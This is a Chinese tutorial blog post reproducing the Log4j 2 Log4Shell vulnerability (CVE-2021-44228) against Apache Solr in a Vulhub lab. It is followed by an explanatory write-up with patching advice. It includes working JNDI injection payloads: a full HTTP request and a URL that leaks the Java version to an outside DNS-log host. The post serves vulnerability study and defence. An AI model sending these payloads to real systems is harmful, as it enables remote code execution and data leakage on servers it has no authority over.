Log4j 2 (CVE-2021-44228)漏洞复现

本文介绍如何通过Vulhub复现Log4j2 (CVE-2021-44228) 漏洞,并详细记录了所需的环境配置及JNDI注入攻击步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Log4j 2 (CVE-2021-44228)漏洞复现

一、复现环境

Vulhub:https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228

二、复现过程

  1. 拉取docker环境
    在这里插入图片描述
    服务器启动后,便可通过地址:http://your-ip:8983 查看 Apache Solr的Dashboard
  2. JNDI注入

使用bp回放Send有效载荷:

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

找一个DNSLog类网站,便可回显信息:

在这里插入图片描述

### CVE-2021-44228 漏洞复现分析 #### Log4j 的介绍 Log4j 是一个广泛使用的Java日志记录库,由Apache软件基金会开发。该库允许开发者通过配置文件灵活控制日志信息的格式、级别以及输出位置。 #### 漏洞概述 CVE-2021-44228是一个存在于Log4j 2.x系列中的严重远程代码执行漏洞。当应用程序使用了受影响版本的日志组件并处理特定模式字符串时,攻击者可以构造恶意输入触发JNDI注入,从而实现任意代码执行或敏感数据泄露[^1]。 #### 复现环境准备 为了安全地研究此漏洞,在隔离环境中搭建测试平台至关重要。通常情况下,这涉及到安装适当的操作系统镜像(如Kali Linux),确保已安装Java Development Kit (JDK),因为目标应用依赖于它来运行。具体来说,对于本案例而言,建议采用JDK 1.8版本[^2]。 #### 构建利用场景 构建模拟攻击的第一步是从GitHub仓库获取专门为此目的设计的工具集——`bkfish/Apache-Log4j-Learning`项目提供了详细的指南和必要的脚本支持。这些资源可以帮助研究人员快速设置好实验条件,并验证不同条件下漏洞的表现形式。 #### 利用方式实例化 一种常见的利用方法是在请求参数中嵌入特殊格式化的字符串表达式`${...}`,其中包含了指向外部LDAP服务器的数据源描述符。例如,向Solr服务发送如下所示的核心管理命令: ```bash http://target/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ib1ozt.dnslog.cn} ``` 这里`${sys:java.version}`会解析成当前系统的Java版本号作为子域名的一部分传递给DNS查询,以此证明存在潜在的安全风险[^4]。 #### 受影响范围确认 一旦成功触发漏洞,可以通过监控网络流量或者查看响应报文中携带的信息判断是否存在异常行为。比如观察到DNS请求中含有预期之外的内容,则表明可能已经遭受了非法入侵尝试;反之如果没有明显的迹象则说明防护措施有效阻止了威胁的发生。 #### 安全加固建议 针对此类高危级别的零日缺陷,官方及时发布了补丁程序修复问题所在之处。因此强烈推荐用户尽快升级至最新稳定版Log4j以消除隐患。除此之外,还应考虑采取其他辅助性的防御策略,诸如限制对外部资源加载权限、启用严格的输入校验机制等手段进一步增强安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值